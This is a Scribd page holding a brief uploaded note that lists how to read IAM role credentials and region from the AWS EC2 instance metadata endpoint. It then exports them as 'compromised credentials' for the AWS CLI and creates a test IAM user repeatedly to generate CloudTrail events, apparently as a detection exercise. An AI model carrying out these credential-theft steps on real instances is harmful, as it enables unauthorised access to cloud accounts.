Scribd
Upload
2 views

aws - Copy (3)

The document outlines steps to obtain AWS EC2 instance credentials and region information through the instance metadata service. It includes instructions for exporting compromised credentials and setting them as environment variables for use with the AWS CLI. Additionally, it suggests generating events in CloudTrail by creating a user multiple times.

Uploaded by

monhalwork
Copyright
© © All Rights Reserved
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
2 views

aws - Copy (3)

The document outlines steps to obtain AWS EC2 instance credentials and region information through the instance metadata service. It includes instructions for exporting compromised credentials and setting them as environment variables for use with the AWS CLI. Additionally, it suggests generating events in CloudTrail by creating a user multiple times.

Uploaded by

monhalwork
Copyright
© © All Rights Reserved
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 1

EC2 Instance:

1- Get credential roles


http://169.254.169.254/latest/meta-data/iam/security-credentials
[role]

2- Obtain the credentials for the role


http://169.254.169.254/latest/meta-data/iam/security-credentials/[role]
-AccessKeyId
-SecretAccessKey
-Token

3- Obtain the region information


http://169.254.169.254/latest/dynamic/instance-identity/document
-region: "eu-west-1"

4- Exporting Compromised credentials


export AWS_ACCESS_KEY_ID=
export AWS_SECRET_ACCESS_KEY=
export AWS_DEFAULT_REGION=
export AWS_SESSION_TOKEN=

5- Define the crendeitlas as variables in cmd (aws cli)


set AWS_ACCESS_KEY_ID=
set AWS_SECRET_ACCESS_KEY=
set AWS_DEFAULT_REGION=
set AWS_SESSION_TOKEN=

6- Generate events in Cloud Trail


[execute 3 times: aws iam create-user --user-name Monhal_test]

7-

You might also like